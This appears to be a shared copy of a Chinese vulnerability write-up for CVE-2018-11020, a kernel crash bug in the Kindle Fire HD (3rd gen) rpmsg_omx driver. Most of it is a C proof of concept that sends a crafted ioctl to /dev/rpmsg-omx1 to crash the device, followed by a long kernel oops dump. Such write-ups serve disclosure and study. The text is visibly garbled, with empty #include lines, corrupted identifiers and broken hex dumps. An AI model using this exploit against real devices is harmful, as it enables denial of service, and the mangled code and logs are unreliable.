（CVE-2018-11020）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx

《（CVE-2018-11020）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx》由会员分享，可在线阅读，更多相关《（CVE-2018-11020）Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.docx（10页珍藏版）》请在优知文库上搜索。

1、(CVE-2018-11020) Amazon Kindle Fire HD (3rd) Fire OS kernel 组件安全漏洞一、漏洞简介Amazon Kindle Fire HD (3rd) Fire OS 4.5.5.3 内核组件中的内核模块 omapdriversrpmsgrpmsg_omx.c 允许攻击者通过设备文件/ dev / rpmsg上的 ioctl的参数注入特制的参数使用命令3221772291的omxl,并导致内核崩溃。要探索此漏洞，必须打开设备文件devrpmsg-omxl,并使用命令3221772291 和精心设计的有效负载作为第三个参数来对该设备文件进行ioct

2、l系统调用。二、漏洞影响Fire OS 4.5.5.3三、复现过程poc/* This is poc of Kindle Fire HD 3rd* A bug in the ioctl interface of device file devrpmsg-omxl causes t he system crash via IOCTL 3221772291.* Related buggy struct name is gcicommit.* This Poc should run with permission to do ioctl on devrpmsg-oml.* The fowllwing

3、 is kmsg of kernel crash infomation:*/#include #include #include #include const static char *driver = devrpmsg-omxl;static command = 3221772291;int main(int argc, char *argv, char *env) unsigned int payload = 0xb5dl8de2, 0f6e48al7j 09179c429, 089 a32e03 ;int fd = 0;fd = open(driverj O_RDWR);if (fd d

4、atalocaltmplog); return -1;printf(Try open %s with command 0%x.n, driver, command); printf(System will crash and reboot.n);if(ioctl(fdj command, Spayload) /data/IOCaItmplog);return -1;close(fd);return 0；崩溃日志146.290710Unable to handle kernel paging request at virtual address b5dl8de6146.299438pgd = d

5、72dc000146.302795b5dl8de6 *pgd=00000000146.307281Internal error: Oops: 5 #1 PREEMPT SMP ARM146.313232Modules linked in: omaplfb(0) pvrsrvkm(O) pvr_loggen(0)146.320983CPU: 0Tainted: GO (3.4.83-gd2afc0bae69 #1)146.328308 PC is at ion_free+0xc0xb4146.332672 LR is at rpmsg_omx_ioctl+0x2cc/0x598146.33789

6、0 pc : Ir : psr: 60000013146.337890 sp : c35b5e60 ip:c35b5e80 fp : c35b5e7c146.350860 rl0: c35b5ea8 r9:de88c4d8 r8 : c35b4000 f8146.356872 r7 : dd32b580 r6：00000003 r5 : d71d5880 r4 : be92f5 00146.364135 r3 : d71d58ec r2:d71d58ec rl : b5dl8de2 r0 : d7aaaa146.371551 Flags: nZCv IRQson FIQs on Mode SV

7、C_32 ISA ARM Segment user146.379516 Control: 10c5387d Table: 972dc04a DAC: 00000015146.386077146.386077 PC： 0xc02e84c0: 146.391052 84c0 0a000001 058 e2433001 e5853058e2871010ebfddc25ela00006eb0ee904e5953146.401580 84e0 e353000003f e285005c e5933cba000011Ia0009ela0200de3c23d7fe3c33146.412292 8500 e59

8、3723c006 eb0ee876 ela00005ela01007ebf90a76e597321ce585306cela00146.422821 8520 ebffffb4 00d e92dd878 e24cb004ela00004ebf8e011e89da8f0e7f001f2ela0c146.433502 8540 e5915004 006 eb0ee8e2 e5953010ela04001el550000la000021e2856014ela00146.444183 8560 e3530000008 e353000090a000005e243200cel5400022a00000ae5

9、933146.454864 8580 e59f0054 e3001219 006 eb0ee856 e89da878e59f2050 e59f3050 ebf58268 ela00146.465393 85a0 85933004 8affffed f93 e3320000 Iafffffa146.476074146.476074 LR: 0c048a0a0:f57ff05f el943f9f e2433001 el842 146.481048 a0a0 33a03000 e3530000 008 ela0000a ebf7305eIaffffae e24ba05c ela01004 e3a02

10、146.491729 a0c0 e3500000 Iaffffaa 000 e50b005c 0a000001e5950068 e51bl058 ebf97677 e3500146.502380 a0e0 e3700a01 9affffc8 018 eaffff8e ela00004e3a03000 e50b305c eaffffc5 e3e00146.513061 al00 ela0100a e3a02008 fc2 e5950068 ebf97904ebf73154 e3500000 0affff88 eafff146.523590 al20 eaffffb9 e24b005c 03c e

11、la03006 e58d2000e3a01030 ebf7398b e3a02030 e5970146.534240 al40 e59fl280 e59f2274 004 e7933101 e3530000ebf99069 e3e0000d eaffff78 e5933146.544921 al60 0affff6c e5950068 a01 8a00001f e5950068ebf97651 e2509000 0a000021 e3790146.555603 al80 ela01009 e24b206405c 0affff9b e59f322c146.566131146.566131 SP:

12、 0xc35b5de0:e24b3060 ebf97447 e3500000 050b9146.571228 5de0 00000004 d8cc50f4540 60000013 ffffffff60010013 00000001 00000001 c02e8146.581787 5e00 c35b5e4c c35b4000370 d7aaaa00 b5dl8de2c35b5e7c c35b5el8 C06a5318 C0008146.592437 5e20 d71d58ec d71d58ec580 c35b4000 de88c4d8be92f5f8 d71d5880 00000003 dd3

13、2b146.603118 5e40 c35b5ea8 c35b5e7c540 60000013 ffffffffc35b5e80 c35b5e60 C048al20 C02e8146.613830 5e60 d71d58ec be92f5f8 e80 C048al20 C02e8540d71d5880 00000003 c35b5f04 c35b5146.624389 5e80 c35b5edc c35b5e90 e40 c35b5ed4 c35b5ea8C0207454 C00bd920 0000001e d7333146.635070 5ea0 C00723a0 000fffff 001

14、00000000 C35b5fl4b5dl8de2 f6e48al7 00000002 00000146.645599 5ec0 00000000 00000001 ee0 c02089fc 00000000146.656158 146.656158 IP: 0xc35b5e00:de88c4d8 c25d7c00 c35b5efc c35b5146.661254 5e00 c35b5e4c c35b4000370 d7aaaa00 b5dl8de2c35b5e7c c35b5el8 C06a5318 C0008146.671936 5e20 d71d58ec d71d58ec580 c35b4000 de88c4d8be92f5f8 d71d5880 00000003 dd32b146.682495 5e4